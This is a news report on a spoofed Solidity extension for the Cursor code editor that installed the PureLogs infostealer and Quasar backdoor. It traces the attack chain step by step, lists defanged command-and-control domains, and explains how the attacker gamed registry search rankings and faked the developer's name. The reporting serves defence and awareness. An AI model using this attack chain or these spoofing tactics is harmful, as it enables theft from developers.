A developer lost $500,000 in crypto assets after installing a malicious extension for Visual Studio Code to their Cursor AI code editor,
Kaspersky reported Thursday.
The “Solidity Language” extension was a spoofed version of the legitimate open-source “solidity” extension for VS Code, which offers features such as syntax highlighting for the Solidity smart contract programming language.
In reality, the fake extension performed no legitimate functions and instead installed the PureLogs infostealer, which collects browser, email and cryptocurrency wallet data, likely leading to the $500,000 crypto theft.
The extension was installed from the Open VSX registry, which
became the default library for the Cursor extension marketplace last month. Cursor is based on VS Code and is largely compatible with extensions made for VS Code.
Extension abuses ScreenConnect, Internet Archive to install malware
The malicious extension kicked off its attack chain by downloading a PowerShell script from the domain angelic[.]su; this script checks if the ConnectWise ScreenConnect remote desktop management is installed.
If ScreenConnect is not present, the script installs a second script from the same web server, which installs and runs a ScreenConnect installer from another server at lmfao[.]su.
ScreenConnect is then used to install three Visual Basic Scripts (VBScripts) from relay[.]lmfao[.]su, which each install an additional script from the text-sharing website paste[.]ee.
This script retrieves an image uploaded to the Internet Archive at archive[.]org; this image uses steganography to hide a VMDetector-based loader. Once extracted, this loader retrieves the final payloads from paste[.]ee: the
Quasar open-source backdoor and the PureLogs infostealer.
The loader, based on the legitimate open-source VMDetector project for detecting virtual machine environments, was previously observed in DCRat banking trojan attacks targeting Colombian users,
according to IBM.
PureLogs is part of the “Pure” malware-as-a-service (MaaS) family, which has been distributed since March 2021,
according to ANY.RUN. The Quasar remote administration tool (RAT) is frequently misused by cybercriminals, including advanced persistent threat (APT) actors, as noted in
a 2019 analysis report from the Cybersecurity & Infrastructure Security Agency (CISA).
Kaspersky noted that its security software detects the PureLogs infostealer, but that the victim reported only using free online services for malware detection rather than any commercial antivirus.
Attacker manipulates algorithm to promote fake extensions
The “Solidity Language” extension involved in this attack has since been removed from the Open VSX registry, but prior to its removal, Kaspersky found that it ranked higher in Open VSX search results for the keyword “solidity” than the legitimate “solidity” extension developed by Juan Blanco.
The spoofed version, which used the same description and logo as the real version, had 54,000 downloads while the original had 61,000, but Kaspersky noted that other factors such as recent updates can also factor into search algorithm rankings.
It is believed that, because the fake extension was last updated on June 15, 2025, while the legitimate one was updated May 30, 2025, the more recently updated version was ranked higher despite its lower download count. Overall, “Solidity Language” appeared fourth in the search results, while “solidity” appeared eighth.
After the malicious extension was removed, another with the same malicious functionality appeared using the identical “solidity” name and spoofed the developer’s name by replacing the lowercase “L” in Blanco with an uppercase “I,” which appear identical in the font used by the Cursor user interface.
This newer version appeared to have 2 million downloads, which Kasperky noted was likely artificially inflated, and was displayed just below the legitimate “solidity” extension before also being removed.
Additional campaigns on the VS Code Marketplace and npm package repository are believed to be connected to the same attacker based on similar attack chains or use of the same command-and-control (C2) server.
In May,
Datadog reported on malicious extensions in the VS Code Marketplace called “solaibot,” “among-eth” and “blankebesxstnion,” which bore similarities to “Solidity Language,” including use of an image hosted on the Internet Archive.
Kaspersky also used its open-source package monitoring tool to discover an npm package called “solsafe” that installs ScreenConnect and connects to the relay[.]lmfao[.]su C2 server.
